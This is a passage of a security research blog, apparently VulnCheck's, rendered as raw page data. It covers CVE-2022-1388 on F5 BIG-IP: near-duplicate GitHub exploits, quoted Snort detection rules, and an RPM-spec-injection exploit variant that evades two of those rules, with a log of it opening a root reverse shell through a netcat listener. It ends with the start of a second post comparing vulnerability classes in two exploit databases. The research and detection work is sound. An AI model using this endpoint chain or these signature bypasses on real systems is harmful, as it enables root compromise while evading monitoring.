args.command)\n",[1373,102659,102660],{"class":1375,"line":4915},[1373,102661,102662],{},"-\n",[1373,102664,102665],{"class":1375,"line":4931},[1373,102666,102662],{},[1373,102668,102669],{"class":1375,"line":4947},[1373,102670,102671],{},"+ exploit(args.target, args.command)\n",[18,102673,102674],{},"The difference between these two “unique” exploits is a slight change in whitespace and a change of the admin user’s password from “horizon3” to “anything.” We found a lot of this sort of thing when we analyzed the 50+ GitHub exploits. For example, consider this screenshot that shows five exploits side-by-side.",[18,102676,102677],{},[68,102678],{":width":10862,"alt":102679,"src":102680},"Related Exploits","\u002Fblog\u002Fnew-cve-2022-1388\u002Frelated-exploits.png",[18,102682,102683,102684,102686,102687,102689,102690,102692],{},"Outside of their comments and output formatting, these exploits are nearly identical (two of these are “Kind of Works” variants because they removed the ",[886,102685,6301],{}," header). A normal hash wouldn’t have been able to identify whether these exploits were related, but ",[886,102688,102359],{}," was able to lump them into two groups. Then we were able to connect them afterward (",[886,102691,102359],{}," is not necessarily optimal for these small file sizes). Their hashes follow:",[307,102694,102695,102703],{},[310,102696,102697],{},[313,102698,102699,102701],{},[316,102700,102377],{},[316,102702,102380],{},[336,102704,102705,102716,102727,102738,102749],{},[313,102706,102707,102710],{},[341,102708,102709],{},"48:rArpnVOEUlQY0YIQUG+Clu8T26HlCO1dg6LQ3HnczPPuoHzPppkqEpvAZgcU2aAD:sFnkDQY5RhQXUfpKqCQgcU1YVbfp",[341,102711,102712],{},[47,102713,102714],{"href":102714,"rel":102715},"https:\u002F\u002Fraw.githubusercontent.com\u002FZephrFish\u002FF5-CVE-2022-1388-Exploit\u002Fmain\u002FCVE_2022_1388.py",[51],[313,102717,102718,102721],{},[341,102719,102720],{},"48:krpnVOEUlQY0YIQUGwhGgfT26HlCO1dg6LQ3HnczPPuoHzPppkqEpvAZgcU2aALn:kFnkDQYQRhQXUfpKqCQgcU1YVbfp",[341,102722,102723],{},[47,102724,102725],{"href":102725,"rel":102726},"https:\u002F\u002Fraw.githubusercontent.com\u002Fdevengpk\u002FCVE-2022-1388\u002Fmain\u002Fexploit.py",[51],[313,102728,102729,102732],{},[341,102730,102731],{},"48:9rpnVO8VCO1dg6LQtnczPPujHzPppkqEpvApgcU2sALslAeKUtxQj4OsZkKClfas:9Fnk2hQtU4pKqCmgcUtMVbfNR",[341,102733,102734],{},[47,102735,102736],{"href":102736,"rel":102737},"https:\u002F\u002Fraw.githubusercontent.com\u002Fthatonesecguy\u002FCVE-2022-1388-Exploit\u002Fmain\u002FCVE_2022_1388.py",[51],[313,102739,102740,102743],{},[341,102741,102742],{},"96:UjbFnk+QY09edQXUwzpdVPAMwxSV5gcU12VLizsp:UjbOY08dQXXd9AMOiw2VLizsp",[341,102744,102745],{},[47,102746,102747],{"href":102747,"rel":102748},"https:\u002F\u002Fraw.githubusercontent.com\u002Fbytecaps\u002FCVE-2022-1388-EXP\u002Fmain\u002Fexp.py",[51],[313,102750,102751,102754],{},[341,102752,102753],{},"96:8Fnk+QY03epQ\u002FJXNSYdpdVYf\u002FMhdgcU1\u002FVLJlp:8OY0OpQ\u002FJXNSQdSnMhs\u002FVLJlp",[341,102755,102756],{},[47,102757,102758],{"href":102758,"rel":102759},"https:\u002F\u002Fraw.githubusercontent.com\u002FLinJacck\u002FCVE-2022-1388-EXP\u002Fmain\u002FCVE-2022-1388.py",[51],[18,102761,102762],{},"The reality is that there are only four exploit variants of CVE-2022-1388 on GitHub because many of the exploits are mostly copy-and-paste jobs. Unfortunately, for us, that means we need to look elsewhere to discover an interesting or new nugget of information. Let’s cast about for the next thing.",[61,102764,102766],{"id":102765},"hunting-on-attackerkb","Hunting on AttackerKB",[18,102768,102769,102770,102775,102776,102780,102781,31686],{},"As a former ",[47,102771,102774],{"href":102772,"rel":102773},"https:\u002F\u002Fattackerkb.com\u002F",[51],"AttackerKB"," contributor, this author is biased. I firmly believe Rapid7’s Technical Analysis’ on AttackerKB is underappreciated. They are a great place to monitor for new exploits. The VulnCheck exploit repository indicates the AttackerKB entry for ",[47,102777,92074],{"href":102778,"rel":102779},"https:\u002F\u002Fattackerkb.com\u002Ftopics\u002FSN5WCzYO7W\u002Fcve-2022-1388\u002Frapid7-analysis",[51]," has exploits. After reading the AttackerKB analysis, we found this important note (likely attributable to ",[47,102782,102785],{"href":102783,"rel":102784},"https:\u002F\u002Fgithub.com\u002Frbowes-r7",[51],"Ron Bowes",[1925,102787,102788],{},[18,102789,102790],{},"While testing, before we knew about \u002Fmgmt\u002Ftm\u002Futil\u002Fbash, we actually devised a much more complicated way to run code: RPM specification injection! We’ll show that method here, because it’s conceivable that an attacker might use it to evade detection. It’s also kinda interesting!",[18,102792,102793],{},"The write-up goes on to describe how to use two HTTP endpoints to execute arbitrary commands on the F5 BIG-IP HTTP management interface:",[1789,102795,102796,102802],{},[25,102797,102798,102801],{},[886,102799,102800],{},"\u002Fmgmt\u002Fshared\u002Fiapp\u002Frpm-spec-creator"," to provide the command(s) to execute",[25,102803,102804,102807],{},[886,102805,102806],{},"\u002Fmgmt\u002Fshared\u002Fiapp\u002Fbuild-package"," to trigger execution.",[18,102809,102810,102811,102816,102817,102822],{},"However, the analysis doesn’t provide a proof of concept exploit that uses the endpoint in conjunction with CVE-2022-1388. Additionally, ",[47,102812,102815],{"href":102813,"rel":102814},"https:\u002F\u002Fgithub.com\u002Fsearch?q=%2Fmgmt%2Fshared%2Fiapp%2Frpm-spec-creator&type=code",[51],"searching GitHub"," for these endpoints doesn’t yield any results for CVE-2022-1388 (Rapid7 later got this issue fixed as ",[47,102818,102821],{"href":102819,"rel":102820},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2022\u002F11\u002F16\u002Fcve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures\u002F",[51],"CVE-2022-41800"," and published their disclosure in November 2022 - the results on GitHub all point to the associated Metasploit module for CVE-2022-41800).",[18,102824,102825,102826,102828],{},"Essentially, the AttackerKB analysis told everyone a CVE-2022-1388 exploit variation was possible. But then no one actually published an exploit demonstrating that. We can remedy that, and we are especially excited to do so because this variant will bypass a second Snort rule! Snort 2.9 Community Rule 57336 explicitly looks for the ",[886,102827,2197],{}," endpoint:",[1354,102830,102832],{"className":100977,"code":102831,"language":100979,"meta":219,"style":219},"content:\"\u002Fmgmt\u002Ftm\u002Futil\u002Fbash\"; fast_pattern:only; http_uri;\n",[886,102833,102834],{"__ignoreMap":219},[1373,102835,102836,102838,102840,102842,102844,102846,102848,102850,102853],{"class":1375,"line":1376},[1373,102837,13389],{"class":4640},[1373,102839,4606],{"class":1383},[1373,102841,183],{"class":1387},[1373,102843,100862],{"class":1391},[1373,102845,183],{"class":1387},[1373,102847,101290],{"class":4640},[1373,102849,4606],{"class":1383},[1373,102851,102852],{"class":4640},"only; http_uri",[1373,102854,4912],{"class":28571},[18,102856,102857,102858,4606],{},"Similarly, Emerging Threats Snort 2.9 Rule 2036556 is bypassed looks for ",[886,102859,102860],{},"\u002Fmgmt\u002Ftm\u002F",[1354,102862,102864],{"className":100977,"code":102863,"language":100979,"meta":219,"style":219},"content:\"\u002Fmgmt\u002Ftm\"; http_uri; depth:8;\n",[886,102865,102866],{"__ignoreMap":219},[1373,102867,102868,102870,102872,102874,102876,102878,102880,102882,102884],{"class":1375,"line":1376},[1373,102869,13389],{"class":4640},[1373,102871,4606],{"class":1383},[1373,102873,183],{"class":1387},[1373,102875,101069],{"class":1391},[1373,102877,183],{"class":1387},[1373,102879,101074],{"class":4640},[1373,102881,4606],{"class":1383},[1373,102883,37681],{"class":5467},[1373,102885,4912],{"class":28571},[18,102887,102888,102889,102893,102894,102897],{},"Here we are again, with next to no original thought, we’ve found a second rule bypass and we’re able to contribute a new exploit variant to the GitHub exploit ecosystem. You can find our new exploit ",[47,102890,305],{"href":102891,"rel":102892},"https:\u002F\u002Fgithub.com\u002Fj-baines\u002Ftippa-my-tongue",[51],". The exploit implements two signature bypasses and opts for the ",[886,102895,102896],{},"X-Forward-Host"," variation. Example output:",[1354,102899,102901],{"className":92494,"code":102900,"language":28578,"meta":219,"style":219},"albinolobster@mournland:~\u002Ftippa-my-tongue$ python3 tippa-my-tongue.py --rhost 10.9.49.191 --lhost 10.9.49.194\n\n ▄▄▄▄▄▪ ▄▄▄· ▄▄▄· ▄▄▄· • ▌ ▄ ·. ▄· ▄\n •██ ██ ▐█ ▄█▐█ ▄█▐█ ▀█ ·██ ▐███▪▐█▪██\n ▐█.▪▐█· ██▀· ██▀·▄█▀▀█ ▐█ ▌▐▌▐█·▐█▌▐█▪\n ▐█▌·▐█▌▐█▪·•▐█▪·•▐█ ▪▐▌ ██ ██▌▐█▌ ▐█▀·.\n ▀▀▀ ▀▀▀.▀ .▀ ▀ ▀ ▀▀ █▪▀▀▀ ▀ • \n ▄▄▄▄▄ ▐ ▄ ▄▄ • ▄• ▄▌▄▄▄ . \n •██ ▪ •█▌▐█▐█ ▀ ▪█▪██▌▀▄.▀· \n ▐█.▪ ▄█▀▄ ▐█▐▐▌▄█ ▀█▄█▌▐█▌▐▀▀▪▄ \n ▐█▌·▐█▌.▐▌██▐█▌▐█▄▪▐█▐█▄█▌▐█▄▄▌ \n ▀▀▀ ▀█▄▀▪▀▀ █▪·▀▀▀▀ ▀▀▀ ▀▀▀ \n\n CVE-2022-1388 \n CVE-2022-41800 \n\n 🦞 \n\n[+] Executing netcat listener\n[+] Using \u002Fusr\u002Fbin\u002Fnc\nListening on 0.0.0.0 1270\n[+] Sending initial request to rpm-spec-creator\n[+] Sending exploit attempt request to build-package\nConnection received on 10.9.49.191 47152\nbash: no job control in this shell\n[@localhost:NO LICENSE:Standalone] BUILD # pwd\npwd\n\u002Fvar\u002Fconfig\u002Frest\u002Fnode\u002Ftmp\u002FBUILD\n[@localhost:NO LICENSE:Standalone] BUILD # id\nid\nuid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n[@localhost:NO LICENSE:Standalone] BUILD #\n",[886,102902,102903,102908,102912,102917,102922,102927,102932,102937,102942,102947,102952,102957,102962,102966,102971,102976,102980,102985,102989,102994,102999,103003,103008,103013,103018,103023,103028,103032,103037,103042,103046,103051],{"__ignoreMap":219},[1373,102904,102905],{"class":1375,"line":1376},[1373,102906,102907],{},"albinolobster@mournland:~\u002Ftippa-my-tongue$ python3 tippa-my-tongue.py --rhost 10.9.49.191 --lhost 10.9.49.194\n",[1373,102909,102910],{"class":1375,"line":220},[1373,102911,6520],{"emptyLinePlaceholder":237},[1373,102913,102914],{"class":1375,"line":1266},[1373,102915,102916],{}," ▄▄▄▄▄▪ ▄▄▄· ▄▄▄· ▄▄▄· • ▌ ▄ ·. ▄· ▄\n",[1373,102918,102919],{"class":1375,"line":1852},[1373,102920,102921],{}," •██ ██ ▐█ ▄█▐█ ▄█▐█ ▀█ ·██ ▐███▪▐█▪██\n",[1373,102923,102924],{"class":1375,"line":4692},[1373,102925,102926],{}," ▐█.▪▐█· ██▀· ██▀·▄█▀▀█ ▐█ ▌▐▌▐█·▐█▌▐█▪\n",[1373,102928,102929],{"class":1375,"line":4724},[1373,102930,102931],{}," ▐█▌·▐█▌▐█▪·•▐█▪·•▐█ ▪▐▌ ██ ██▌▐█▌ ▐█▀·.\n",[1373,102933,102934],{"class":1375,"line":4756},[1373,102935,102936],{}," ▀▀▀ ▀▀▀.▀ .▀ ▀ ▀ ▀▀ █▪▀▀▀ ▀ • \n",[1373,102938,102939],{"class":1375,"line":4768},[1373,102940,102941],{}," ▄▄▄▄▄ ▐ ▄ ▄▄ • ▄• ▄▌▄▄▄ . \n",[1373,102943,102944],{"class":1375,"line":4792},[1373,102945,102946],{}," •██ ▪ •█▌▐█▐█ ▀ ▪█▪██▌▀▄.▀· \n",[1373,102948,102949],{"class":1375,"line":4798},[1373,102950,102951],{}," ▐█.▪ ▄█▀▄ ▐█▐▐▌▄█ ▀█▄█▌▐█▌▐▀▀▪▄ \n",[1373,102953,102954],{"class":1375,"line":4806},[1373,102955,102956],{}," ▐█▌·▐█▌.▐▌██▐█▌▐█▄▪▐█▐█▄█▌▐█▄▄▌ \n",[1373,102958,102959],{"class":1375,"line":4817},[1373,102960,102961],{}," ▀▀▀ ▀█▄▀▪▀▀ █▪·▀▀▀▀ ▀▀▀ ▀▀▀ \n",[1373,102963,102964],{"class":1375,"line":4825},[1373,102965,6520],{"emptyLinePlaceholder":237},[1373,102967,102968],{"class":1375,"line":4835},[1373,102969,102970],{}," CVE-2022-1388 \n",[1373,102972,102973],{"class":1375,"line":4843},[1373,102974,102975],{}," CVE-2022-41800 \n",[1373,102977,102978],{"class":1375,"line":4849},[1373,102979,6520],{"emptyLinePlaceholder":237},[1373,102981,102982],{"class":1375,"line":4877},[1373,102983,102984],{}," 🦞 \n",[1373,102986,102987],{"class":1375,"line":4915},[1373,102988,6520],{"emptyLinePlaceholder":237},[1373,102990,102991],{"class":1375,"line":4931},[1373,102992,102993],{},"[+] Executing netcat listener\n",[1373,102995,102996],{"class":1375,"line":4947},[1373,102997,102998],{},"[+] Using \u002Fusr\u002Fbin\u002Fnc\n",[1373,103000,103001],{"class":1375,"line":4952},[1373,103002,35384],{},[1373,103004,103005],{"class":1375,"line":6776},[1373,103006,103007],{},"[+] Sending initial request to rpm-spec-creator\n",[1373,103009,103010],{"class":1375,"line":6781},[1373,103011,103012],{},"[+] Sending exploit attempt request to build-package\n",[1373,103014,103015],{"class":1375,"line":7524},[1373,103016,103017],{},"Connection received on 10.9.49.191 47152\n",[1373,103019,103020],{"class":1375,"line":7530},[1373,103021,103022],{},"bash: no job control in this shell\n",[1373,103024,103025],{"class":1375,"line":7546},[1373,103026,103027],{},"[@localhost:NO LICENSE:Standalone] BUILD # pwd\n",[1373,103029,103030],{"class":1375,"line":7571},[1373,103031,98638],{},[1373,103033,103034],{"class":1375,"line":7598},[1373,103035,103036],{},"\u002Fvar\u002Fconfig\u002Frest\u002Fnode\u002Ftmp\u002FBUILD\n",[1373,103038,103039],{"class":1375,"line":7615},[1373,103040,103041],{},"[@localhost:NO LICENSE:Standalone] BUILD # id\n",[1373,103043,103044],{"class":1375,"line":7635},[1373,103045,9460],{},[1373,103047,103048],{"class":1375,"line":7640},[1373,103049,103050],{},"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n",[1373,103052,103053],{"class":1375,"line":7648},[1373,103054,103055],{},"[@localhost:NO LICENSE:Standalone] BUILD #\n",[61,103057,103059],{"id":103058},"out-of-luck","Out of Luck",[18,103061,103062],{},"We’ve gathered variant ideas from GitHub. We’ve pilfered a new exploit endpoint from a better researcher. We’ve written a new exploit and bypassed two Snort rules, but there is still one more Snort rule we haven’t bypassed. Snort 2.9 Community Rule 59735:",[1354,103064,103065],{"className":100977,"code":101344,"language":100979,"meta":219,"style":219},[886,103066,103067,103103,103117,103133,103155,103173],{"__ignoreMap":219},[1373,103068,103069,103071,103073,103075,103077,103079,103081,103083,103085,103087,103089,103091,103093,103095,103097,103099,103101],{"class":1375,"line":1376},[1373,103070,100986],{"class":4640},[1373,103072,4644],{"class":28571},[1373,103074,101232],{"class":2326},[1373,103076,99071],{"class":1379},[1373,103078,100993],{"class":28571},[1373,103080,4656],{"class":28571},[1373,103082,100998],{"class":2326},[1373,103084,4656],{"class":28571},[1373,103086,101003],{"class":11735},[1373,103088,1384],{"class":1383},[1373,103090,101008],{"class":11735},[1373,103092,4606],{"class":1383},[1373,103094,183],{"class":1387},[1373,103096,101377],{"class":1391},[1373,103098,183],{"class":1387},[1373,103100,101020],{"class":11735},[1373,103102,99089],{"class":1383},[1373,103104,103105,103107,103109,103111,103113,103115],{"class":1375,"line":220},[1373,103106,101027],{"class":11735},[1373,103108,4606],{"class":1383},[1373,103110,101270],{"class":11735},[1373,103112,5437],{"class":1383},[1373,103114,101396],{"class":11735},[1373,103116,99089],{"class":1383},[1373,103118,103119,103121,103123,103125,103127,103129,103131],{"class":1375,"line":1266},[1373,103120,51846],{"class":11735},[1373,103122,4606],{"class":1383},[1373,103124,183],{"class":1387},[1373,103126,100918],{"class":1391},[1373,103128,183],{"class":1387},[1373,103130,101413],{"class":11735},[1373,103132,99089],{"class":1383},[1373,103134,103135,103137,103139,103141,103143,103145,103147,103149,103151,103153],{"class":1375,"line":1852},[1373,103136,51846],{"class":11735},[1373,103138,4606],{"class":1383},[1373,103140,183],{"class":1387},[1373,103142,101426],{"class":1391},[1373,103144,183],{"class":1387},[1373,103146,101431],{"class":11735},[1373,103148,4606],{"class":1383},[1373,103150,445],{"class":5467},[1373,103152,101438],{"class":11735},[1373,103154,99089],{"class":1383},[1373,103156,103157,103159,103161,103163,103165,103167,103169,103171],{"class":1375,"line":4692},[1373,103158,101123],{"class":11735},[1373,103160,4606],{"class":1383},[1373,103162,183],{"class":1387},[1373,103164,101451],{"class":1391},[1373,103166,15491],{"class":2326},[1373,103168,101456],{"class":1391},[1373,103170,183],{"class":1387},[1373,103172,4912],{"class":11735},[1373,103174,103175,103177,103179,103181,103183,103185,103187,103189,103191,103193,103195,103197,103199,103201,103203,103205,103207,103209,103211],{"class":1375,"line":4724},[1373,103176,101465],{"class":11735},[1373,103178,4606],{"class":1383},[1373,103180,242],{"class":11735},[1373,103182,5437],{"class":1383},[1373,103184,100820],{"class":5467},[1373,103186,61062],{"class":1397},[1373,103188,101478],{"class":5467},[1373,103190,101481],{"class":11735},[1373,103192,4606],{"class":1383},[1373,103194,101486],{"class":11735},[1373,103196,61062],{"class":1397},[1373,103198,101491],{"class":11735},[1373,103200,4606],{"class":1383},[1373,103202,101496],{"class":5467},[1373,103204,101207],{"class":11735},[1373,103206,4606],{"class":1383},[1373,103208,353],{"class":5467},[1373,103210,39663],{"class":11735},[1373,103212,11875],{"class":1383},[18,103214,103215,103216,103218,103219,103222],{},"The problem is this: Snort Community Rule 59735 does an excellent job of catching a single minimum requirement for exploitation. At the end of the day, exploitation will always require a ",[886,103217,6331],{}," header that contains ",[886,103220,103221],{},"X-F5-Auth…",". It might not be the most performant rule (requires searching the entire HTTP header). It might be prone to false positives (particularly of other exploits). But after rooting around the F5 jar files for a possible normalization bypass, I’ll be damned if we can bypass this one. So hats off to you, Snort Community member! You’ve bested us this time!",[18,103224,103225,103226,103228,103229,103232,103233,103235],{},"But that’s not to say 59735 is the best Snort rule for this vulnerability. Or even a good Snort rule at all. It’s not especially good for performance reasons and really not good for the potential for false positives. For my money, the Emerging Threats signature is the best rule. If they update the rule to drop the ",[886,103227,9024],{}," logic, adjust the ",[886,103230,103231],{},"http_uri",", and fix the ",[886,103234,6331],{}," regular expression then it will likely be the most performant and most accurate.",[61,103237,1903],{"id":1902},[18,103239,103240,103241,103243],{},"We explored open-source intelligence surrounding CVE-2022-1388. This vulnerability has been examined from every angle over the last year, but we thought we might be able to squeeze out one more interesting tidbit. In this blog, we detailed the exploit variants on GitHub, we found a few network signature bypasses, and we published a new exploit variant. All that was achievable ",[1131,103242,62400],{}," using open-source intelligence. Vulnerability analysis, Vulnerability intelligence - they aren’t always done with a debugger. Sometimes it’s just picking up where others have left off, and iterating.",[18,103245,103246,103247,103250],{},"Do you like GitHub exploits too? To get access to our collection of GitHub exploits, register for a VulnCheck account today by loading ",[47,103248,78319],{"href":78319,"rel":103249},[51]," and clicking “Register”.",[2901,103252,103253],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sSsL9, html code.shiki .sSsL9{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .s4fT8, html code.shiki .s4fT8{--shiki-light:#90A4AE;--shiki-light-font-style:inherit;--shiki-default:#B31D28;--shiki-default-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic;--shiki-sepia:#F44747;--shiki-sepia-font-style:inherit}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sAZ-3, html code.shiki .sAZ-3{--shiki-light:#6182B8;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .squCx, html code.shiki .squCx{--shiki-light:#E53935;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}",{"title":219,"searchDepth":220,"depth":220,"links":103255},[103256,103257,103258,103264,103265,103266,103267],{"id":100832,"depth":220,"text":100833},{"id":100955,"depth":220,"text":100956},{"id":101512,"depth":220,"text":101513,"children":103259},[103260,103261,103262,103263],{"id":101528,"depth":1266,"text":101529},{"id":101815,"depth":1266,"text":101816},{"id":101976,"depth":1266,"text":101977},{"id":102138,"depth":1266,"text":102139},{"id":102346,"depth":220,"text":102347},{"id":102765,"depth":220,"text":102766},{"id":103058,"depth":220,"text":103059},{"id":1902,"depth":220,"text":1903},"2023-04-13","In search of an interesting new detail about CVE-2022-1388, VulnCheck researchers pore over open source intelligence. The researchers detail exploit variants, find signature bypasses, and publish a novel exploit variant.",{"slug":103271},"new-cve-2022-1388","\u002Fblog\u002Fnew-cve-2022-1388",{"title":100731,"description":103269},"blog\u002Fnew-cve-2022-1388",[242],"_vd6HHQ1UOxYN333ZXyyt3qlttT7LbdbCd4rvpwOL9A",{"id":103278,"title":103279,"articles":7,"authors":103280,"body":103282,"date":103564,"description":103565,"extension":234,"image":7,"link":7,"meta":103566,"navigation":237,"path":103568,"seo":103569,"series":7,"stem":103570,"subtype":7,"tags":7,"__hash__":103571},"blog\u002Fblog\u002Fexploit-database-followup.md","A Follow-up to the Exploit-DB and 0day.today Comparison",[103281],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":103283,"toc":103559},[103284,103295,103301,103305,103314,103319,103326,103331,103335,103340,103344,103365,103383,103386,103389,103394,103398,103403,103406,103413,103422,103425,103430,103434,103438,103441,103443,103452,103461,103464,103469,103475,103480,103485,103488,103496,103499,103502,103510,103515,103519,103522,103530,103535,103538,103541,103543,103550,103553],[18,103285,103286,103287,103294],{},"After we published last week’s blog, ",[1131,103288,103289],{},[47,103290,103293],{"href":103291,"rel":103292},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fedb-0day-compare",[51],"A Comparison of Exploit-DB and 0day.today",", readers suggested additional data points they thought might be interesting. Those suggestions sparked a wave of ideas. Building on last week’s material, this blog looks deeper at the types of vulnerabilities in Exploit-DB and 0day.today and their use in the wild.",[18,103296,103297,103298,103300],{},"We mentioned this last week, but it bears repeating: 0day.today has a huge volume of exploits (~38,000), but only about 20% of those are associated with a CVE. Exploit-DB has even more exploits (~45,000), and they’ve associated CVE with more than half of those. That can make comparisons look a little skewed. Regardless, we think there’s a lot of value in discussing the exploits ",[1131,103299,297],{}," their associated CVE, so that is where this blog is focused.",[61,103302,103304],{"id":103303},"digging-into-the-exploits-cve","Digging into the Exploit’s CVE",[18,103306,103307,103308,103313],{},"The suggestion that really got the ball rolling was from ",[47,103309,103312],{"href":103310,"rel":103311},"https:\u002F\u002Fwww.reddit.com\u002Fr\u002Fnetsec\u002Fcomments\u002F127pexp\u002Fa_comparison_of_exploitdb_and_0daytoday\u002Fjege2mt\u002F",[51],"\u002Fu\u002FNo-Succotash4783"," on Reddit:",[1925,103315,103316],{},[18,103317,103318],{},"Nice job pulling that report. It would be nice to also show the top CWEs \u002F class of vulnerabilities for which exploits exist.",[18,103320,103321,103322,59],{},"We were able to quickly produce “Top 10 Database CVE CWE” graphs by cross-referencing the exploits against our ",[47,103323,1239],{"href":103324,"rel":103325},"https:\u002F\u002Fvulncheck.com\u002Fproduct\u002Fvulnerability-intelligence",[51],[1925,103327,103328],{},[18,103329,103330],{},"Exploit-DB CVE Top 10 CWE",[11128,103332],{":labels":103333,":values":103334},"[\"SQL Injection\",\"XSS\",\"Code Injection\",\"NVD-CWE-Other\",\"Path Traversal\",\"Generic Buffer Overflow\",\"Out-of-bounds Write\",\"Improper Input Validation\",\"Broken Access Control\",\"Information Leak\"]","[4601,3386,2107,1895,1891,1826,1411,971,764,670]",[1925,103336,103337],{},[18,103338,103339],{},"0day.today CVE Top 10 CWE",[11128,103341],{":labels":103342,":values":103343},"[\"XSS\",\"Generic Buffer Overflow\",\"SQL Injection\",\"NVD-CWE-noinfo\",\"Path Traversal\",\"Information Leak\",\"Improper Input Validation\",\"Command Injection\",\"CSRF\",\"Broken Access Control\"]","[921,588,540,410,365,316,309,284,258,227]",[18,103345,103346,103347,103352,103353,103358,103359,103364],{},"The high volume of ",[47,103348,103351],{"href":103349,"rel":103350},"https:\u002F\u002Fcwe.mitre.org\u002Fdata\u002Fdefinitions\u002F79.html",[51],"cross-site scripting"," (XSS) exploits might suggest the databases don’t have the real-world application that attackers might hope for. While XSS is useful for bug bounties, they’re rarely associated with any real threat group. Proofpoint’s recent discovery of ",[47,103354,103357],{"href":103355,"rel":103356},"https:\u002F\u002Fwww.proofpoint.com\u002Fus\u002Fblog\u002Fthreat-insight\u002Fexploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability",[51],"Winter Vivern"," using a Zimbra XSS (",[47,103360,103363],{"href":103361,"rel":103362},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-27926",[51],"CVE-2022-27926",") in the wild is the only one we can recall in recent memory.",[18,103366,103367,103368,103373,103374,103379,103380,103382],{},"Otherwise, the databases have similar Top 10 CWE. The only real surprise is the absence of Command Injection (",[47,103369,103372],{"href":103370,"rel":103371},"https:\u002F\u002Fcwe.mitre.org\u002Fdata\u002Fdefinitions\u002F78.html",[51],"CWE-78",") in Exploit-DB and the absence of Code Injection (",[47,103375,103378],{"href":103376,"rel":103377},"https:\u002F\u002Fcwe.mitre.org\u002Fdata\u002Fdefinitions\u002F94.html",[51],"CWE-94",") in 0day.today. Last week, we discussed that 0day.today assigns more CVEs to ",[1131,103381,15523],{}," vulnerabilities than EDB has. Perhaps this shows that Code Injection is on the way down and, somehow, Command Injection is on the rise.",[18,103384,103385],{},"Of course, CWE doesn’t tell the full story. One of the weaknesses of CWE is that it doesn’t necessarily describe how a vulnerability is used. For instance, a generic buffer overflow might be used over the network (with or without credentials). It could be used locally during privilege escalation. Maybe it’s used during a user interaction exploit (e.g., in a document-oriented attack). All three of those scenarios represent significantly different attacks.",[18,103387,103388],{},"VulnCheck attempts to address this short-coming by automatically categorizing CVE according to their most likely attack scenario: initial-access, 